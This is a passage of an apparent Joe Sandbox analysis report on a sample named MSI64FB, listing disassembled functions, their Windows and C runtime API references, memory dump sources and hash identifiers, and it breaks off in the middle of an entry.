                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F4CBB0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF749F4CC15
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F4CBB0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF749F4CCB6
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF749F76370
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF749F76700
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F432A0: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF749F4101D), ref: 00007FF749F432B2
                                                                                                                                                                                                                                                    • _Wcsftime.LIBCMT ref: 00007FF749F767CD
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF749F76977
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$_invalid_parameter_noinfo_noreturn$Lockit::_Lockit::~_$AllocLocalWcsftime
                                                                                                                                                                                                                                                    • String ID: !%x$%.0Lf$0123456789-
                                                                                                                                                                                                                                                    • API String ID: 1237603019-778084515
                                                                                                                                                                                                                                                    • Opcode ID: 00bc372d4dcd9754968869968e82af8cdb94930d39b3e0abb69084ef3b2f15b3
                                                                                                                                                                                                                                                    • Instruction ID: 1f31bc19c941df94e5a5a62243082f7cc64ca0f383daa9f523be2bc4f91e5e0b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00bc372d4dcd9754968869968e82af8cdb94930d39b3e0abb69084ef3b2f15b3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F462BE62B0CA8589EB11FFA5E8103BCA771AB55BD8F844232EE1D17BDADE38D445C311
                                                                                                                                                                                                                                                    Function 00007FF749F4D590 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 527COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID: %$+
                                                                                                                                                                                                                                                    • API String ID: 195334829-2626897407
                                                                                                                                                                                                                                                    • Opcode ID: 554102ddff73537220a196dd684dd1d0855e8e44c95f376474da4f7e056b2446
                                                                                                                                                                                                                                                    • Instruction ID: b16a4476874971161cd7c95f7f5a6f0c8722fa107f5d4e42046aa1d6461bacc4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 554102ddff73537220a196dd684dd1d0855e8e44c95f376474da4f7e056b2446
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16220F22B5CA85DAFB20AF64D4507FDB3B1AB64788F844132DE4C1BBD9DE2CE5458360
                                                                                                                                                                                                                                                    Function 00007FF749F97BB4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 231COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: NameTranslate$CodeInfoLocalePageValid_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: utf8
                                                                                                                                                                                                                                                    • API String ID: 2487361160-905460609
                                                                                                                                                                                                                                                    • Opcode ID: ba7ca8e1a257779dd8df9c1a03646b7fbc43847761393a49558fc2d35c8c31fc
                                                                                                                                                                                                                                                    • Instruction ID: fe0272b52246a0a1aa7053c2b8f1293c53eabd7dbff2c72cccf737ce011687d8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba7ca8e1a257779dd8df9c1a03646b7fbc43847761393a49558fc2d35c8c31fc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB918B36B0CB82C6EB64BF2294416BAA3B4AF86B84F844136DE4D477C5DF3CE5558320
                                                                                                                                                                                                                                                    Function 00007FF749F78B00 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                                                    • Opcode ID: 44e6b253834ebe2b8f0a40aa827606b52057286abb5eaea34fa0ff00bf028703
                                                                                                                                                                                                                                                    • Instruction ID: 0248a92bade6f10ca6f2be7428d3912ee208227df365555b0c68a590541859b6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44e6b253834ebe2b8f0a40aa827606b52057286abb5eaea34fa0ff00bf028703
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03313E72709B81C5EB60AFA4E8907EDB370FB45754F80503ADA4D47B94DF78D5488720
                                                                                                                                                                                                                                                    Function 00007FF749F91CAC Relevance: 9.3, APIs: 6, Instructions: 336timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF749F91CF1
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F91B38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF749F91B4C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F8E5C0: HeapFree.KERNEL32(?,?,?,00007FF749F96936,?,?,?,00007FF749F96CB3,?,?,00000000,00007FF749F97239,?,?,?,00007FF749F9716B), ref: 00007FF749F8E5D6
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F8E5C0: GetLastError.KERNEL32(?,?,?,00007FF749F96936,?,?,?,00007FF749F96CB3,?,?,00000000,00007FF749F97239,?,?,?,00007FF749F9716B), ref: 00007FF749F8E5E0
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F7DE54: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF749F7DE02,?,?,?,?,?,00007FF749F7DD02), ref: 00007FF749F7DE5D
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F7DE54: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF749F7DE02,?,?,?,?,?,00007FF749F7DD02), ref: 00007FF749F7DE82
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F9A534: _invalid_parameter_noinfo.LIBCMT ref: 00007FF749F9A47F
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF749F91CE0
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F91B98: _invalid_parameter_noinfo.LIBCMT ref: 00007FF749F91BAC
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF749F91F5A
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF749F91F6B
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF749F91F7C
                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF749F921C6), ref: 00007FF749F91FA3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4070488512-0
                                                                                                                                                                                                                                                    • Opcode ID: df2901f57f053f2e923aa3c6697a5588aa57501976bb22a0017dc6eefe800273
                                                                                                                                                                                                                                                    • Instruction ID: 12df9843429e39726bf4be440d672a433e0f9055835141c6363a5b899461d433
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df2901f57f053f2e923aa3c6697a5588aa57501976bb22a0017dc6eefe800273
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FD1AE26B1C242CAE724FF26D8509B9A7B1EF86794FC04136EA4D47AD5EF3CE4418760
                                                                                                                                                                                                                                                    Function 00007FF749F98620 Relevance: 9.2, APIs: 6, Instructions: 172COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale$InfoValid$CodeDefaultEnumLocalesPageSystemUser
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3082464267-0
                                                                                                                                                                                                                                                    • Opcode ID: afc32d9d63be1d3e4626d176850ab3f8e49c11078196f985b874c262b1335c21
                                                                                                                                                                                                                                                    • Instruction ID: 1c814b9008863fbaff11f198c46ed9c24da99065e48217ab8c0cb416076f5d79
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: afc32d9d63be1d3e4626d176850ab3f8e49c11078196f985b874c262b1335c21
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4713222B1C642C9FB64BFA0D8506A8A3B4BB4A788FC84435CA1D576D5EF3CE845C761
                                                                                                                                                                                                                                                    Function 00007FF749F7DB38 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1239891234-0
                                                                                                                                                                                                                                                    • Opcode ID: 83b412ae3b68c008a892cd0af64821969cb4994b1a61d8c39dda2845404606c4
                                                                                                                                                                                                                                                    • Instruction ID: eea4ff7dc79cad31c468e19535338f620f21d488592ced4204bfe107296bbb30
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83b412ae3b68c008a892cd0af64821969cb4994b1a61d8c39dda2845404606c4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA415032618B81C6D760AF64E8403AEB3B4FB897A4F900136EA9D47B98DF7CD155CB10
                                                                                                                                                                                                                                                    Function 00007FF749F98428 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                    • Opcode ID: 337680252ed998718458d653699ea08981dcd96a061274d2fe919e2dc49f18ba
                                                                                                                                                                                                                                                    • Instruction ID: 9ebf8ce76733930ff36ffcd9cd811cdaaeaa9c69958082b4de9729a874c1af37
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 337680252ed998718458d653699ea08981dcd96a061274d2fe919e2dc49f18ba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08112C21B1C682D2F764FF55E4406BAE2B4FF45B84FD05431EA4A436C4DF2CE8458B20
                                                                                                                                                                                                                                                    Function 00007FF749F87A7C Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 1001COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                    • API String ID: 1286766494-4108050209
                                                                                                                                                                                                                                                    • Opcode ID: 41cca790a5cc39c673306f57ff37011ce6ce58c9ccc5238fbbcf1a752aebdf6b
                                                                                                                                                                                                                                                    • Instruction ID: d56e75df8871aaa648d60b9bc77033cb6979f3fd8a575917432385d3f2400120
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41cca790a5cc39c673306f57ff37011ce6ce58c9ccc5238fbbcf1a752aebdf6b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38929C32A0CA82C6E7A4FF259454279E7B5FB85B84BC44135DB8927BD9DF3DE9018320
                                                                                                                                                                                                                                                    Function 00007FF749F93FC4 Relevance: 7.8, APIs: 5, Instructions: 286COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2227656907-0
                                                                                                                                                                                                                                                    • Opcode ID: 47d46f8031b63c899680aa499be73dd33220b322af9a5b7722bdc02ba7ebf0c0
                                                                                                                                                                                                                                                    • Instruction ID: 166e307f791b78ec6dea9ae15f05e19f13d019e74fd3c1396e8eb06f8d7cc4cb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47d46f8031b63c899680aa499be73dd33220b322af9a5b7722bdc02ba7ebf0c0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64B1AF22B1C6A2C1EB61FF2294006B9E371BB66BD4F844132EA5D47BD5EE3CE4418320
                                                                                                                                                                                                                                                    Function 00007FF749F527B8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF749F5283B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                    • API String ID: 389471666-631824599
                                                                                                                                                                                                                                                    • Opcode ID: 0a006dacdcb009a39946ba4df59ee5c25c313724c8cad9f10cc9e586cf2139f0
                                                                                                                                                                                                                                                    • Instruction ID: b95c36b46189a8aa162750f698a937276650b4f1ac7db43b669c9eccb9b76a95
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a006dacdcb009a39946ba4df59ee5c25c313724c8cad9f10cc9e586cf2139f0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4116D32708B42E7E744BF62DA403B972B0FB04355F805135CA0D82AA1EF3CE1B48720
                                                                                                                                                                                                                                                    Function 00007FF749F91F2C Relevance: 6.1, APIs: 4, Instructions: 144timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF749F91F5A
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F91B98: _invalid_parameter_noinfo.LIBCMT ref: 00007FF749F91BAC
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF749F91F6B
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F91B38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF749F91B4C
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF749F91F7C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F91B68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF749F91B7C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F8E5C0: HeapFree.KERNEL32(?,?,?,00007FF749F96936,?,?,?,00007FF749F96CB3,?,?,00000000,00007FF749F97239,?,?,?,00007FF749F9716B), ref: 00007FF749F8E5D6
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F8E5C0: GetLastError.KERNEL32(?,?,?,00007FF749F96936,?,?,?,00007FF749F96CB3,?,?,00000000,00007FF749F97239,?,?,?,00007FF749F9716B), ref: 00007FF749F8E5E0
                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF749F921C6), ref: 00007FF749F91FA3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3458911817-0
                                                                                                                                                                                                                                                    • Opcode ID: ede5a0b6ed619ab1c9e683908661bffefd74f46d039d7be0245d02b2f95aec8a
